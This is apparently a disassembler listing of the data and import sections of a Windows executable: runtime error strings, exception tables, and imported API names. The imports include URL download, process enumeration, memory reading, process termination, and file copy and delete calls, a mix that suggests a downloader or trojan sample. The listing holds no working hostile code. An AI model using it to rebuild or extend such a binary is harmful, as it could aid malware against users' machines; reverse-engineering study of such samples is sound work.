dbl_41BC80 dq 0.0 ; DATA XREF: sub_411C56+6�r
; sub_4165AD+8D�r ...
dword_41BC88 dd 30302B65h, 30h ; DATA XREF: sub_411CCB+95�o
dbl_41BC90 dq 1.0 ; DATA XREF: sub_411FA8+2A�r
; sub_4142AA+6D�r ...
dbl_41BC98 dq 4.195835e6 ; DATA XREF: sub_411FA8+F�r
dbl_41BCA0 dq 3.145727e6 ; DATA XREF: sub_411FA8+6�r
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_411FE8+F�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: sub_411FE8�o
align 10h
dword_41BCD0 dd 2 dup(0) ; DATA XREF: sub_412ED1+1C�o
; sub_41512C+1E�o
stru_41BCD8 _msEH <0FFFFFFFFh, offset loc_4131CA, offset loc_4131CE>
; DATA XREF: sub_412ED1+2�o
dd 0FFFFFFFFh, 412FC7h, 412FCBh, 0FFFFFFFFh, 413095h, 413099h
dd 0
db 2 dup(0)
word_41BD02 dw 20h ; DATA XREF: sub_416CB5+18�r
; .text:off_4214EC�o
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 41h dup(0)
dword_41BF08 dd 200000h, 4 dup(200020h), 280068h, 280028h, 200028h
; DATA XREF: .text:004214F0�o
dd 8 dup(200020h), 480020h, 7 dup(100010h), 840010h, 4 dup(840084h)
dd 100084h, 3 dup(100010h), 3 dup(1810181h), 0Ah dup(1010101h)
dd 3 dup(100010h), 3 dup(1820182h), 0Ah dup(1020102h)
dd 2 dup(100010h), 10h dup(200020h), 480020h, 8 dup(100010h)
dd 140010h, 100014h, 2 dup(100010h), 100014h, 2 dup(100010h)
dd 1010010h, 0Bh dup(1010101h), 1010010h, 3 dup(1010101h)
dd 0Ch dup(1020102h), 1020010h, 3 dup(1020102h), 1010102h
dd 0
stru_41C110 _msEH <0FFFFFFFFh, 0, offset sub_4137B3> ; DATA XREF: sub_41370C+2�o
align 10h
dd offset loc_413779
dd offset loc_413782
stru_41C128 _msEH <0FFFFFFFFh, offset sub_4137FD, offset loc_413806>
; DATA XREF: sub_4137C9+2�o
align 8
stru_41C138 _msEH <0FFFFFFFFh, 0, offset sub_41395D> ; DATA XREF: sub_41382B+2�o
align 8
dd offset loc_4138A5
dd offset loc_4138E8
stru_41C150 _msEH <0FFFFFFFFh, offset sub_413B31, offset loc_413B35>
; DATA XREF: sub_4139C1+2�o
align 10h
stru_41C160 _msEH <0FFFFFFFFh, offset loc_413EFC, offset loc_413F00>
; DATA XREF: sub_413EDF+2�o
align 10h
stru_41C170 _msEH <0FFFFFFFFh, offset loc_413F29, offset loc_413F2D>
; DATA XREF: sub_413F0C+2�o
dd 2 dup(0)
dd 7FF00000h, 0
dd 0FFF00000h, 0
dd 7FE00000h, 0
dd 200000h, 3 dup(0)
dd 80000000h, 7F800000h, 0FF800000h, 7FC00000h, 0FFC00000h
dd 0
dd 80000000h, 7149F2CAh, 0F149F2CAh, 0DA24260h, 8DA24260h
dd 0C2F8F359h, 1A56E1Fh, 0C2F8F359h, 81A56E1Fh
aAtan db 'atan',0 ; DATA XREF: sub_413F8C:loc_4141C8�o
align 10h
aCeil db 'ceil',0 ; DATA XREF: sub_413F8C:loc_4141BF�o
align 4
aFloor db 'floor',0 ; DATA XREF: sub_413F8C:loc_4141B6�o
align 10h
aModf db 'modf',0 ; DATA XREF: sub_413F8C+212�o
align 4
aExp2 db 'exp2',0 ; DATA XREF: sub_413F8C:loc_414141�o
align 10h
aExp10 db 'exp10',0 ; DATA XREF: sub_413F8C+1A5�o
align 4
aLog2 db 'log2',0 ; DATA XREF: sub_413F8C:loc_41410E�o
; sub_413F8C+195�o
align 10h
aPow db 'pow',0 ; DATA XREF: sub_413F8C:loc_414039�o
; sub_413F8C+D2�o ...
aLog_0 db 'log',0 ; DATA XREF: sub_413F8C:loc_414017�o
; sub_413F8C+9A�o ...
aLog10 db 'log10',0 ; DATA XREF: sub_413F8C:loc_413FFC�o
; sub_413F8C+7F�o ...
align 10h
aExp db 'exp',0 ; DATA XREF: sub_413F8C+51�o
; sub_413F8C+64�o ...
align 8
stru_41C238 _msEH <0FFFFFFFFh, offset loc_41423F, offset loc_414243>
; DATA XREF: sub_41421E+2�o
dd 746E7572h, 20656D69h, 6F727265h, 2072h, 534F4C54h, 72652053h
dd 0D726F72h, 0Ah, 474E4953h, 72726520h, 0A0D726Fh, 0
dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h
dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h
dd 65682065h, 0A0D7061h, 0
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio db 0Dh,0Ah
db 'This application has requested the Runtime to terminate it in an '
db 'unusual way.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 10h
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .text:off_421524�o
db '- floating point not loaded',0Dh,0Ah,0
align 10h
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_4144B2+12C�o
; sub_41533C+134�o
align 4
asc_41C568 db 0Ah ; DATA XREF: sub_4144B2+110�o
; sub_41533C+101�o
db 0Ah,0
align 4
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_4144B2+FE�o
db 0Ah
db 'Program: ',0
align 4
a___ db '...',0 ; DATA XREF: sub_4144B2+CA�o
; sub_41533C+D1�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_4144B2+89�o
; sub_41533C+88�o
align 8
stru_41C5A8 _msEH <0FFFFFFFFh, offset loc_415205, offset loc_415209>
; DATA XREF: sub_41512C+2�o
dword_41C5B4 dd 676F7250h, 3A6D6172h, 20h ; DATA XREF: sub_41533C+10D�o
aABufferOverrun db 'A buffer overrun has been detected which has corrupted the progra'
; DATA XREF: sub_41533C+62�o
db 'm',27h,'s',0Ah
db 'internal state. The program cannot safely continue execution and'
db ' must',0Ah
db 'now be terminated.',0Ah,0
aBufferOverrunD db 'Buffer overrun detected!',0 ; DATA XREF: sub_41533C:loc_415399�o
align 10h
aASecurityError db 'A security error of unknown cause has been detected which has',0Ah
; DATA XREF: sub_41533C+4F�o
db 'corrupted the program',27h,'s internal state. The program cannot sa'
db 'fely',0Ah
db 'continue execution and must now be terminated.',0Ah,0
align 4
aUnknownSecurit db 'Unknown security failure detected!',0 ; DATA XREF: sub_41533C+4A�o
align 4
stru_41C758 _msEH <0FFFFFFFFh, offset loc_415377, offset loc_41537B>
; DATA XREF: sub_41533C+5�o
align 8
stru_41C768 _msEH <0FFFFFFFFh, offset loc_416104, offset loc_416108>
; DATA XREF: sub_41602F+2�o
a_nextafter db '_nextafter',0
align 10h
a_logb db '_logb',0
align 4
a_yn db '_yn',0
a_y1 db '_y1',0
a_y0 db '_y0',0
aFrexp db 'frexp',0
align 4
aFmod db 'fmod',0
align 4
a_hypot db '_hypot',0
align 4
a_cabs db '_cabs',0
align 4
aLdexp db 'ldexp',0
align 4
aFabs db 'fabs',0
align 4
aTan db 'tan',0
aCos db 'cos',0
aSin db 'sin',0
aSqrt db 'sqrt',0
align 4
aAtan2 db 'atan2',0
align 10h
aAcos db 'acos',0
align 4
aAsin db 'asin',0
align 10h
aTanh db 'tanh',0
align 4
aCosh db 'cosh',0
align 10h
aSinh db 'sinh',0
align 4
aGetprocesswind db 'GetProcessWindowStation',0 ; DATA XREF: sub_416BBC+73�o
aGetuserobjecti db 'GetUserObjectInformationA',0 ; DATA XREF: sub_416BBC+62�o
align 4
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_416BBC+47�o
align 10h
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_416BBC+3F�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_416BBC+2E�o
a1Qnan db '1#QNAN',0 ; DATA XREF: sub_417423:loc_417512�o
align 4
a1Inf db '1#INF',0 ; DATA XREF: sub_417423+D2�o
align 4
a1Ind db '1#IND',0 ; DATA XREF: sub_417423+C1�o
align 4
a1Snan db '1#SNAN',0 ; DATA XREF: sub_417423+A7�o
align 4
dd offset dword_41C94C
off_41C890 dd offset loc_417D27 ; DATA XREF: sub_417CC2+20�o
; sub_417D0C+8�o ...
dd offset sub_417CFE
dd offset dword_41C998
off_41C89C dd offset loc_417D43 ; DATA XREF: sub_417D5F�o
; sub_417E2C+33�o ...
dd offset sub_417CFE
dd offset dword_41C9E4
off_41C8A8 dd offset loc_417D6A ; DATA XREF: sub_417D86�o
; sub_417D91+33�o ...
dd offset sub_417CFE
aInvalidStringP db 'invalid string position',0 ; DATA XREF: sub_417D91+D�o
aStringTooLong db 'string too long',0 ; DATA XREF: sub_417E2C+D�o
dd offset dword_41CA28
off_41C8DC dd offset loc_417F07 ; DATA XREF: sub_417EF2�o
; .text:off_421A54�o ...
; ---------------------------------------------------------------------------
push esp
retf 41h
; ---------------------------------------------------------------------------
off_41C8E4 dd offset loc_417FA1 ; DATA XREF: sub_417F23+A�o
; sub_417F34+8�o ...
dd offset sub_417F94
aUnknownExcepti db 'Unknown exception',0 ; DATA XREF: sub_417F94+7�o
align 10h
off_41C900 dd offset off_421A54 ; DATA XREF: .text:0041C934�o
; .text:0041C980�o ...
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
off_41C918 dd offset off_421A6C ; DATA XREF: .text:0041C930�o
; .text:0041C97C�o ...
dd 1, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_41C918
dd offset off_41C900
dword_41C938 dd 3 dup(0) ; DATA XREF: .text:0041C95C�o
dd 2, 41C930h
dword_41C94C dd 3 dup(0) ; DATA XREF: .text:0041C88C�o
dd offset off_421A6C
dd offset dword_41C938+4
off_41C960 dd offset off_421A8C ; DATA XREF: .text:0041C978�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_41C960
dd offset off_41C918
dd offset off_41C900
dd 0
db 0 ; DATA XREF: .text:0041C9A8�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 3, 41C978h
dword_41C998 dd 3 dup(0) ; DATA XREF: .text:0041C898�o
dd offset off_421A8C
dd offset unk_41C988
off_41C9AC dd offset off_421AAC ; DATA XREF: .text:0041C9C4�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_41C9AC
dd offset off_41C918
dd offset off_41C900
dword_41C9D0 dd 3 dup(0) ; DATA XREF: .text:0041C9F4�o
dd 3, 41C9C4h
dword_41C9E4 dd 3 dup(0) ; DATA XREF: .text:0041C8A4�o
dd offset off_421AAC
dd offset dword_41C9D0+4
off_41C9F8 dd offset off_421ACC ; DATA XREF: .text:0041CA10�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_41C9F8
dd 0
db 0 ; DATA XREF: .text:0041CA38�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 1, 41CA10h
dword_41CA28 dd 3 dup(0) ; DATA XREF: .text:0041C8D8�o
dd offset off_421ACC
dd offset unk_41CA18
dd offset off_41C900
dd 3 dup(0)
dd 1, 41CA3Ch, 3 dup(0)
; ---------------------------------------------------------------------------
push esp
sbb al, [edx+0]
inc esp
retf 41h
; ---------------------------------------------------------------------------
dd 0
dword_41CA6C dd 2 dup(0) ; DATA XREF: sub_4115B2+C�o
; sub_4115B2:loc_4115C5�o
dword_41CA74 dd 0 ; DATA XREF: .text:00411602�o
; .text:loc_411609�o
dd 0FFFFFFFFh, 417FBDh, 0
dd offset loc_417FC5
dd 1, 417FCDh, 2, 417FD5h
dword_41CA98 dd 19930520h, 4, 41CA78h, 4 dup(0) ; DATA XREF: .text:loc_417FDD�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 0
dd 1, 0
dd 1, 4 dup(0)
dd offset sub_40C269
align 10h
dd offset loc_40C1F7
dd 2 dup(2), 3, 1, 41CAD4h, 2 dup(0)
dd 3, 1, 41CAE4h
dword_41CB1C dd 19930520h, 4, 41CAB4h, 2, 41CAF4h, 2 dup(0)
; DATA XREF: .text:loc_417FE7�o
dd 0FFFFFFFFh, 417FF1h
dword_41CB40 dd 19930520h, 1, 41CB38h, 4 dup(0) ; DATA XREF: .text:loc_417FF9�o
dd 0FFFFFFFFh, 418003h, 0
dd offset loc_41800B
dword_41CB6C dd 19930520h, 2, 41CB5Ch, 4 dup(0) ; DATA XREF: .text:loc_418013�o
dd 0FFFFFFFFh, 41802Fh, 19930520h, 1, 41CB88h, 5 dup(0)
dd offset off_421A54
align 8
dd 0FFFFFFFFh, 0
dd 0Ch, 417F34h, 0
dd offset off_421A6C
dd 0
dd 0FFFFFFFFh, 0
dd 28h, 417DD1h, 0
dd offset off_421AAC
align 10h
dd 0FFFFFFFFh, 0
dword_41CBF8 dd 28h, 417E14h, 3, 41CBE4h, 41CBC8h, 41CBACh ; DATA XREF: .text:0041CC1C�o
dword_41CC10 dd 0 ; DATA XREF: sub_417D91+2A�o
dd offset sub_417D86
dd 0
dd offset dword_41CBF8+8
dd 0FFFFFFFFh, 41801Dh
dword_41CC28 dd 19930520h, 1, 41CC20h, 4 dup(0) ; DATA XREF: .text:loc_418025�o
dd 0FFFFFFFFh, 41802Fh
dword_41CC4C dd 19930520h, 1, 41CC44h, 5 dup(0) ; DATA XREF: .text:loc_418037�o
dd offset off_421A8C
dd 0
dd 0FFFFFFFFh, 0
dword_41CC7C dd 28h, 417E6Ch, 3, 41CC68h, 41CBC8h, 41CBACh ; DATA XREF: .text:0041CCA0�o
dword_41CC94 dd 0 ; DATA XREF: sub_417E2C+2A�o
dd offset sub_417D5F
align 10h
dd offset dword_41CC7C+8
dd 0FFFFFFFFh, 41801Dh, 19930520h, 1, 41CCA4h, 4 dup(0)
dd 1CF7Ch, 2 dup(0)
dd 1CFC8h, 19214h, 1CF68h, 2 dup(0)
dd 1D022h, 19200h, 1CD88h, 2 dup(0)
dd 1D4F0h, 19020h, 1CF48h, 2 dup(0)
dd 1D528h, 191E0h, 1CD68h, 2 dup(0)
dd 1D5ACh, 19000h, 1CF40h, 2 dup(0)
; ---------------------------------------------------------------------------
retf 1D5h
; ---------------------------------------------------------------------------
align 4
dd 191D8h, 1CF58h, 2 dup(0)
dd 1D618h, 191F0h, 5 dup(0)
dd 77DD23D7h, 77DDACABh, 77DD590Bh, 77DD59F0h, 77DD5C55h
dd 77DD189Ah, 77DD22EAh, 0
dd 77E7C866h, 77E641EBh, 77F522F2h, 77E7F044h, 77E7C3A5h
dd 77E6169Ah, 77E73FF9h, 77E77EE1h, 77E7C9E1h, 77E67702h
dd 77E9C5B1h, 77EB9A84h, 77E7C9E7h, 77E781F9h, 77E79924h
dd 77E77405h, 77E61BE6h, 77E77963h, 77EBAAFAh, 77E73628h
dd 77E616B4h, 77E706B7h, 77E70396h, 77EBA994h, 77EBB1E7h
dd 77E61A54h, 77EBA6E9h, 77EBA595h, 77E7A099h, 77E79F93h
dd 77E70F89h, 77E61BB8h, 77E6AD34h, 77E76A2Eh, 77E7751Ah
dd 77F5157Dh, 77E7AC37h, 77E704FCh, 77E75CB5h, 77E80656h
dd 77E6BD13h, 77E74CABh, 77E76432h, 77E79D5Bh, 77E802FCh
dd 77E78C17h, 77E73C49h, 77E79D8Ch, 77E7A837h, 77E6C0E3h
dd 77E96645h, 77E80618h, 77E805D8h, 77E79C90h, 77E7A5FDh
dd 77E78EAAh, 77E79424h, 77E794BFh, 77E75E67h, 77E75D9Eh
dd 77E78B82h, 77E78C81h, 77E793EFh, 77E64106h, 77E64006h
dd 77E75090h, 77E74D76h, 77E77797h, 77E73CE2h, 77E668D9h
dd 77E7C657h, 77E77CCEh, 77E73BEFh, 77E73167h, 77E74672h
dd 77E7513Ch, 77E65F4Ch, 77E76C1Ah, 77E75CEBh, 77F7E300h
dd 77F7E21Fh, 77E7C706h, 77F53275h, 77E73196h, 77F5722Fh
dd 77E7980Ah, 77E79E34h, 77E77CC4h, 77E6167Bh, 77E7FF2Eh
dd 77E7339Ch, 77E7176Ch, 77E70192h, 77E7C2C4h, 77E7011Ah
dd 77E7C726h, 77E76E0Bh, 77E7849Fh, 77E6C703h, 77E7A13Fh
dd 77E78406h, 77F51597h, 77F516F8h, 77F6183Eh, 77E6D706h
dd 77E6177Ah, 77E7C938h, 77E7C931h, 77E79C3Dh, 0
dd 77428B97h, 0
; ---------------------------------------------------------------------------
push 0FFFFFFC9h
aam 77h
retf 0D4BDh
; ---------------------------------------------------------------------------
db 77h
dd 77D4702Fh, 0
dd 77C015E3h, 77C0162Dh, 77C0167Dh, 0
aPgVaVmnVPV db 'PG!va vMN v v',0
align 4
db 90h
db 18h, 0ABh, 71h
dd 71AB1B7Bh, 71AB1746h, 71AB155Ah, 71AB5690h, 71AB8629h
dd 71AB157Eh, 71AB41DAh, 71AB1746h, 71AB3C22h, 71AB3E5Dh
dd 71AB1A6Dh, 71AB1836h, 71AB12F8h, 71ABD755h, 71AB2BBFh
dd 71AB401Ch, 71AB1AF4h, 0
db 57h ; W
db 53h, 32h, 5Fh
db 33h ; 3
db 32h, 2Eh, 64h
db 6Ch ; l
db 6Ch, 2 dup(0)
db 92h ;
align 2
aInternetopen_0 db 'InternetOpenA',0
aI db 'i',0
aInternetclos_0 db 'InternetCloseHandle',0
db '',0
aInternetread_0 db 'InternetReadFile',0
align 2
aU db '',0
aInternetopen_1 db 'InternetOpenUrlA',0
align 2
aWininet_dll_0 db 'WININET.dll',0
dw 329h
aSleep db 'Sleep',0
db ',',0
aClosehandle db 'CloseHandle',0
db 48h ; H
db 2, 4Dh, 6Fh
aDule32next db 'dule32Next',0
align 4
db 'x',0
aDeletefilea db 'DeleteFileA',0
dw 331h
aTerminateproce db 'TerminateProcess',0
align 2
dw 261h
aOpenprocess db 'OpenProcess',0
db 0EFh ;
db 2, 53h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
dw 246h
aModule32firs_0 db 'Module32First',0
db 'h',0
aCreatetoolhe_0 db 'CreateToolhelp32Snapshot',0
align 2
dw 293h
aReadprocessmem db 'ReadProcessMemory',0
dw 273h
aProcess32nex_0 db 'Process32Next',0
dw 271h
aProcess32fir_0 db 'Process32First',0
align 4
db 65h ; e
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
align 2
dw 167h
aGetmodulehandl db 'GetModuleHandleA',0
align 2
dw 15Ch
aGetlocaltime db 'GetLocalTime',0
align 2
db '\',0
aCreateprocessa db 'CreateProcessA',0
align 4
db 0B6h ;
db 1, 47h, 65h
aTtemppatha db 'tTempPathA',0
align 4
db 95h ;
db 3, 6Ch, 73h
aTrcmpia db 'trcmpiA',0
db 0BEh ;
db 1, 47h, 65h
aTtickcount db 'tTickCount',0
align 4
db 5Ah ; Z
db 1, 47h, 65h
aTlasterror db 'tLastError',0
align 4
aE db 'e',0
aCreatethread db 'CreateThread',0
align 4
db 0A6h ;
db 1, 47h, 65h
aTsystemdirecto db 'tSystemDirectoryA',0
db '',0
aExitprocess db 'ExitProcess',0
db 30h ; 0
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcessId',0
db ':',0
aCopyfilea db 'CopyFileA',0
dw 148h
aGetfileattribu db 'GetFileAttributesA',0
align 10h
db 92h ;
db 3, 6Ch, 73h
aTrcmpa db 'trcmpA',0
align 4
db 65h ; e
db 3, 57h, 61h
aItforsingleobj db 'itForSingleObject',0
aW db 'W',0
aCreatemutexa db 'CreateMutexA',0
align 2
jmp short loc_41D226
; ---------------------------------------------------------------------------
db 53h, 65h
; ---------------------------------------------------------------------------
loc_41D226: ; CODE XREF: .text:0041D222�j
jz short loc_41D26D
jb short near ptr loc_41D299+3
outsd
jb short near ptr loc_41D279+1
outsd
db 64h
add gs:[eax], al
lodsb
add [ebp+78h], al
imul esi, [esp+edx*2+68h], 64616572h
; ---------------------------------------------------------------------------
dw 0
dd 72570376h, 46657469h, 656C69h, 7243004Ah, 65746165h
dd 656C6946h, 13D0041h, 44746547h, 65766972h, 65707954h
dd 15F0041h
; ---------------------------------------------------------------------------
inc edi
loc_41D26D: ; CODE XREF: .text:loc_41D226�j
db 65h
jz short loc_41D2BC
outsd
imul esp, [bp+di+61h], 6972446Ch
loc_41D279: ; CODE XREF: .text:0041D22B�j
jbe short loc_41D2E0
push ebx
jz short near ptr loc_41D2EF+1
imul ebp, [esi+67h], 0E5004173h
add [esi+72h], al
db 65h, 65h
dec esp
imul esp, [edx+72h], 797261h
add cl, cs:[edi+ebp*2+61h]
db 64h
dec esp
loc_41D299: ; CODE XREF: .text:0041D228�j
imul esp, [edx+72h], 41797261h
; ---------------------------------------------------------------------------
dd 12F0000h
aGetcurrentproc db 'GetCurrentProcess',0
dw 189h
dd 50746547h
; ---------------------------------------------------------------------------
loc_41D2BC: ; CODE XREF: .text:loc_41D26D�j
jb short loc_41D32D
arpl [ecx+64h], ax
db 64h
jb short near ptr loc_41D322+7
jnb short near ptr loc_41D337+2
; ---------------------------------------------------------------------------
dw 0
dd 694600C1h, 6C43646Eh, 65736Fh, 694600B8h, 6954656Ch
dd 6F54656Dh
; ---------------------------------------------------------------------------
loc_41D2E0: ; CODE XREF: .text:loc_41D279�j
push ebx
jns short near ptr loc_41D354+2
jz short near ptr loc_41D349+1
insd
push esp
imul ebp, [ebp+65h], 0B70000h
inc esi
loc_41D2EF: ; CODE XREF: .text:0041D27C�j
imul ebp, [ebp+54h], 54656D69h
outsd
dec esp
outsd
arpl [ecx+6Ch], sp
inc esi
imul ebp, [ebp+54h], 656D69h
into
add [esi+69h], al
outsb
db 64h
dec esi
db 65h
js short near ptr loc_41D380+4
inc esi
imul ebp, [ebp+41h], 4600C500h
imul ebp, [esi+64h], 73726946h
jz short loc_41D368
loc_41D322: ; CODE XREF: .text:0041D2C1�j
imul ebp, [ebp+41h], 2900000h
push edx
db 65h
popa
loc_41D32D: ; CODE XREF: .text:loc_41D2BC�j
db 64h
inc esi
imul ebp, [ebp+0], 5302F100h
loc_41D337: ; CODE XREF: .text:0041D2C4�j
db 65h
jz short loc_41D380
imul ebp, [ebp+50h], 746E696Fh
db 65h
jb short $+3
add [ebp+1], cl
inc edi
loc_41D349: ; CODE XREF: .text:0041D2E3�j
db 65h
jz short near ptr loc_41D390+2
imul ebp, [ebp+53h], 657A69h
loc_41D354: ; CODE XREF: .text:0041D2E1�j
mov edi, 74654701h
push esp
imul ebp, [ebp+65h], 6D726F46h
popa
jz short near ptr loc_41D3A3+2
; ---------------------------------------------------------------------------
dd 1330000h
; ---------------------------------------------------------------------------
loc_41D368: ; CODE XREF: .text:0041D320�j
inc edi
db 65h
jz short loc_41D3B0
popa
jz short near ptr loc_41D3D3+1
inc esi
outsd
jb short loc_41D3E0
popa
jz short near ptr loc_41D3B6+1
; ---------------------------------------------------------------------------
dw 0
dd 6E550345h, 5670616Dh
; ---------------------------------------------------------------------------
loc_41D380: ; CODE XREF: .text:loc_41D337�j
; .text:0041D30D�j
imul esp, [ebp+77h], 6946664Fh
insb
add gs:[edx+eax+4Dh], al
popa
jo short near ptr loc_41D3E2+4
loc_41D390: ; CODE XREF: .text:loc_41D349�j
imul esp, [ebp+77h], 6946664Fh
insb
add gs:[ebx+0], cl
inc ebx
jb short loc_41D404
popa
jz short near ptr loc_41D406+1
inc esi
loc_41D3A3: ; CODE XREF: .text:0041D362�j
imul ebp, [ebp+4Dh], 69707061h
outsb
db 67h
inc ecx
; ---------------------------------------------------------------------------
dw 0
; ---------------------------------------------------------------------------
loc_41D3B0: ; CODE XREF: .text:0041D369�j
cmc
add dl, [ebx+65h]
jz short loc_41D3FC
loc_41D3B6: ; CODE XREF: .text:0041D374�j
imul ebp, [ebp+54h], 656D69h
dec edi
add [edi+65h], eax
jz short near ptr loc_41D406+4
imul ebp, [ebp+54h], 656D69h
scasb
add [ebp+78h], al
jo short loc_41D433
outsb
loc_41D3D3: ; CODE XREF: .text:0041D36D�j
db 64h
inc ebp
outsb
jbe short loc_41D441
jb short near ptr loc_41D447+2
outsb
insd
outs dx, byte ptr gs:[esi]
jz short loc_41D433
loc_41D3E0: ; CODE XREF: .text:0041D371�j
jz short loc_41D454
loc_41D3E2: ; CODE XREF: .text:0041D38E�j
imul ebp, [esi+67h], 0C8004173h
add [edi+65h], eax
jz short loc_41D444
db 65h
jb short loc_41D464
imul ebp, [edi+6Eh], 417845h
push ecx
add cl, [ebp+75h]
loc_41D3FC: ; CODE XREF: .text:0041D3B4�j
insb
jz short near ptr loc_41D467+1
inc edx
jns short near ptr loc_41D474+2
db 65h
push esp
loc_41D404: ; CODE XREF: .text:0041D39D�j
outsd
push edi
loc_41D406: ; CODE XREF: .text:0041D3A0�j
; .text:0041D3C2�j
imul esp, [ebp+43h], 726168h
wait
add ebp, [ebx+esi*2+74h]
jb short near ptr loc_41D474+4
jo short loc_41D490
outsb
inc ecx
add [eax+74736C03h], bl
jb short near ptr loc_41D47E+6
jo short loc_41D49C
inc ecx
; ---------------------------------------------------------------------------
dd 39E0000h, 7274736Ch, 416E656Ch
db 2 dup(0), 5Dh
; ---------------------------------------------------------------------------
loc_41D433: ; CODE XREF: .text:0041D3D0�j
; .text:0041D3DE�j
add [edi+65h], eax
jz short near ptr loc_41D47E+6
outsd
arpl [ecx+6Ch], sp
db 65h
dec ecx
outsb
outsw
loc_41D441: ; CODE XREF: .text:0041D3D6�j
inc ecx
; ---------------------------------------------------------------------------
dw 0
; ---------------------------------------------------------------------------
loc_41D444: ; CODE XREF: .text:0041D3EC�j
add [ecx], eax
inc edi
loc_41D447: ; CODE XREF: .text:0041D3D8�j
db 65h
jz short near ptr loc_41D48C+1
outsd
insd
jo short near ptr loc_41D4C0+3
jz short loc_41D4B5
jb short loc_41D4A0
popa
insd
loc_41D454: ; CODE XREF: .text:loc_41D3E0�j
db 65h
inc ecx
; ---------------------------------------------------------------------------
dw 0
dd 6C4701E3h, 6C61626Fh, 6F6D654Dh
; ---------------------------------------------------------------------------
loc_41D464: ; CODE XREF: .text:0041D3EE�j
jb short near ptr loc_41D4DD+2
push ebx
loc_41D467: ; CODE XREF: .text:0041D3FD�j
jz short loc_41D4CA
jz short loc_41D4E0
jnb short $+2
add [edx], dh
add edx, [ebp+72h]
insd
loc_41D474: ; CODE XREF: .text:0041D400�j
; .text:0041D413�j
imul ebp, [esi+61h], 68546574h
jb short near ptr loc_41D4E1+1
popa
loc_41D47E: ; CODE XREF: .text:0041D41F�j
; .text:0041D436�j
add fs:61654C02h, ch
jbe short near ptr loc_41D4E9+3
inc ebx
jb short loc_41D4F3
jz short loc_41D4F5
loc_41D48C: ; CODE XREF: .text:loc_41D447�j
arpl [ecx+6Ch], sp
push ebx
loc_41D490: ; CODE XREF: .text:0041D415�j
arpl gs:[ecx+ebp*2+6Fh], si
outsb
; ---------------------------------------------------------------------------
dw 0
dd 6E45008Bh
; ---------------------------------------------------------------------------
loc_41D49C: ; CODE XREF: .text:0041D421�j
jz short loc_41D503
jb short loc_41D4E3
loc_41D4A0: ; CODE XREF: .text:0041D450�j
jb short near ptr loc_41D509+2
jz short loc_41D50D
arpl [ecx+6Ch], sp
push ebx
arpl gs:[ecx+ebp*2+6Fh], si
outsb
; ---------------------------------------------------------------------------
dw 0
dd 6E490203h
db 69h
; ---------------------------------------------------------------------------
loc_41D4B5: ; CODE XREF: .text:0041D44E�j
jz short loc_41D520
popa
insb
imul edi, [edx+65h], 74697243h
loc_41D4C0: ; CODE XREF: .text:0041D44C�j
imul esp, [ebx+61h], 6365536Ch
jz short near ptr word_41D532
outsd
loc_41D4CA: ; CODE XREF: .text:loc_41D467�j
outsb
inc ecx
outsb
db 64h
push ebx
jo short loc_41D53A
outsb
inc ebx
outsd
jnz short loc_41D544
jz short $+2
jbe short $+2
inc esp
db 65h
insb
loc_41D4DD: ; CODE XREF: .text:loc_41D464�j
db 65h
jz short loc_41D545
loc_41D4E0: ; CODE XREF: .text:0041D469�j
inc ebx
loc_41D4E1: ; CODE XREF: .text:0041D47B�j
jb short near ptr loc_41D54A+2
loc_41D4E3: ; CODE XREF: .text:0041D49E�j
jz short loc_41D54E
arpl [ecx+6Ch], sp
push ebx
loc_41D4E9: ; CODE XREF: .text:0041D485�j
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [ebx+45h], cl
push edx
loc_41D4F3: ; CODE XREF: .text:0041D488�j
dec esi
inc ebp
loc_41D4F5: ; CODE XREF: .text:0041D48A�j
dec esp
xor esi, [edx]
db 2Eh, 64h
insb
insb
